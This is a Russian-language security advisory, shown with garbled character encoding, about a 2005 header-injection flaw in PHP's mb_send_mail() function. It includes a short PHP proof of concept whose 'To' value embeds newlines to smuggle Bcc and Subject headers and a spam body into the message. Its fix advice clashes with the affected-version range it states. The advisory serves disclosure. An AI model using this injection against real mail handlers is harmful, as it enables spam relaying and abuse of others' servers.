»нклюдинг произвольных заголовков в функции mb_send_mail() в PHP

ƒата публикации:
29.11.2005
¬сего просмотров:
2613
ќпасность:
—редн€€
Ќаличие исправлени€:
„астично
 оличество у€звимостей:
1
CVSSv2 рейтинг:
CVE ID:
Ќет данных
¬ектор эксплуатации:
”даленна€
¬оздействие:
Ќеавторизованное изменение данных
ќбход ограничений безопасности
CWE ID:
Ќет данных
Ќаличие эксплоита:
Ќет данных
”€звимые продукты:
PHP 5.0.x
PHP 4.4.x
”€звимые версии: PHP 4.4.x, версии до 5.1.0

ќписание:
”€звимость позвол€ет удаленному пользователю обойти ограничени€ безопасности.

”€звимость существует в функции "mb_send_mail()". ”даленный пользователь, контролирующий входные данные в параметр "To" у€звимой функции может внедрить в письмо произвольные заголовки. ѕример:

<?php

$TO = "s.masugata@digicom.dnp.co.jp\nBcc:
s.masugata@digicom.dnp.co.jp\n".
"Subject: SPAM Subject\n\nSPAM SPAM SPAM SPAM Body";

mb_send_mail( $TO, "TEST Subject", "TEST Body" ); // NG!! mail send.
mail( $TO, "TEST Subject", "TEST Body" ); // OK!! mail not send.

?>

URL производител€: php.net

–ешение: ”становите последнюю версию (5.0.1) с сайта производител€.

»сточник:

—сылки: header can be injected when using mb_send_mail()

или введите им€

CAPTCHA